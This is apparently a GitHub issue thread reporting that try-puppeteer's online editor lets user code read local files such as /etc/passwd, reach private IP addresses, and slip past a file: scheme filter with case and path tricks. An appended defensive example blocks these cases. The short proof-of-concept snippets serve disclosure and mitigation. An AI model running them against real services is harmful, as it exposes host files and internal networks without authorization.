Comments (8)
Thanks for the heads up! Chrome requires flags to allow access to file:/// from various web platform APIs. Puppeteer might want to do the same for security reasons.
In the meantime, I think we can intercept requests and prevent navigations to anything but https?:// URLs.
from try-puppeteer.
Looks like it is still possible to get a list of all your users.
If you run this code:
```js
const browser = await puppeteer.launch();
const page = await browser.newPage();
await page.goto('file:///etc/passwd');
console.log(await page.content());
await page.screenshot({path: 'screenshot.png'});
await browser.close();
```
You'll get all users on the host.
from try-puppeteer.
@ebidel Looks like I'm also able to render pages on private IPs
```js
const browser = await puppeteer.launch();
const page = await browser.newPage();
await page.goto('http://127.0.0.1:8080');
console.log(await page.content());
await page.screenshot({path: 'screenshot.png'});
await browser.close();
```
from try-puppeteer.
That's the https://backend-dot-try-puppeteer.appspot.com/ container. The app runs on the same VM and exposes 8080 as a webservice.
from try-puppeteer.
Well sure, I put that as a quick example. One could imagine someone using the try-puppeteer code editor to scan the private IP address space looking for sensitive data.
from try-puppeteer.
@ebidel
I think you already know, we can still use the "file:" scheme with the patterns below.
- upper characters → 'FILE://etc/passwd'
- containing unintended「.」 → 'file:/./etc/passwd'
- string concatenation → 'fi'+'le://etc/passwd'

Thank you.
from try-puppeteer.
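Added example, not part of the thread or of try-puppeteer's own code: one way to implement the scheme check proposed in the first comment so that it is applied to the parsed URL rather than to the source string, which rejects the `file:` variants listed above and the loopback address from the earlier comment. The names `isAllowedUrl`, `isInternalIPv4` and `guardPage` are hypothetical, and the blocked address ranges are an assumed policy.

```javascript
// Added example: allowlist check for URLs a sandboxed Puppeteer page may load.
const ALLOWED_PROTOCOLS = new Set(['http:', 'https:']);

// True for IPv4 literals in unspecified, loopback, private or link-local ranges
// (assumed policy for this sketch).
function isInternalIPv4(host) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(host);
  if (!m) return false;
  const a = Number(m[1]);
  const b = Number(m[2]);
  return a === 0 || a === 10 || a === 127 ||
    (a === 169 && b === 254) ||
    (a === 172 && b >= 16 && b <= 31) ||
    (a === 192 && b === 168);
}

function isAllowedUrl(raw) {
  let url;
  try {
    url = new URL(raw); // the parser lowercases the scheme, so 'FILE:' becomes 'file:'
  } catch {
    return false; // unparseable input is rejected, not passed through
  }
  if (!ALLOWED_PROTOCOLS.has(url.protocol)) return false;
  const host = url.hostname;
  if (host === 'localhost' || host.endsWith('.localhost')) return false;
  if (host.startsWith('[')) return false; // IPv6 literals: all rejected in this sketch
  return !isInternalIPv4(host);
}

// Applies the check to each request Puppeteer hands to the interception handler.
// The handler receives the final URL string, however user code assembled it.
async function guardPage(page) {
  await page.setRequestInterception(true);
  page.on('request', (req) => {
    if (isAllowedUrl(req.url())) req.continue();
    else req.abort();
  });
}

// Constructed sample inputs, taken from the cases raised in this thread.
for (const u of ['https://example.com/', 'FILE://etc/passwd',
  'file:/./etc/passwd', 'fi' + 'le://etc/passwd', 'http://127.0.0.1:8080']) {
  console.log(isAllowedUrl(u) ? 'allow' : 'block', u);
}
```

The check covers literal addresses only; hostnames are not resolved, so network-level egress restrictions on the container are still needed.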
@ebidel can you provide a security contact email? It would be great to send an email with more information on a variant of this issue that could have higher risks than the one provided here (and that should be fixed asap).
from try-puppeteer.